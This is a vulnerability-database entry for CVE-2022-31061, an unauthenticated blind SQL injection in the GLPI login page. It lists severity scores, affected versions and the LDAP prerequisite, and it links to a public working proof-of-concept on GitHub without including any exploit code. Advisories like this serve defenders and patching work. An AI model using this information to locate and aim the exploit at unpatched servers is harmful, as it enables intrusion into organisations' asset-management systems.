CVE-2022-31061

CRITICAL

GLPI 9.3.0-9.5.7 - Unauthenticated SQL Injection via Login Page

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 1 public exploit for CVE-2022-31061. PoCs published by Wangyanan131.

AI-analyzed exploit summary This is a functional proof-of-concept exploit for CVE-2022-31061, an unauthenticated SQL injection vulnerability in GLPI versions >= 9.3.0 and < 10.0.2. The exploit leverages a time-based blind SQL injection on the login page when LDAP authentication is enabled.

Description

GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. In affected versions there is a SQL injection vulnerability which is possible on login page. No user credentials are required to exploit this vulnerability. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.

Exploits (1)

nomisec WORKING POC 4 stars
by Wangyanan131 · poc
https://github.com/Wangyanan131/CVE-2022-31061

This is a functional proof-of-concept exploit for CVE-2022-31061, an unauthenticated SQL injection vulnerability in GLPI versions >= 9.3.0 and < 10.0.2. The exploit leverages a time-based blind SQL injection on the login page when LDAP authentication is enabled.

Classification
Working Poc 95%
Attack Type
Sqli
Complexity
Moderate
Reliability
Reliable
Target: GLPI >= 9.3.0 and < 10.0.2
No auth needed
Prerequisites: LDAP authentication must be enabled on the target GLPI instance
devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (2)

Core 2

Scores

CVSS v3 9.8
EPSS 0.4591
EPSS Percentile 97.7%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation none
Automatable yes
Technical Impact total

Details

CWE
CWE-89
Status published
Products (1)
glpi-project/glpi 9.3.0 - 9.5.8
Published Jun 28, 2022
Tracked Since Feb 18, 2026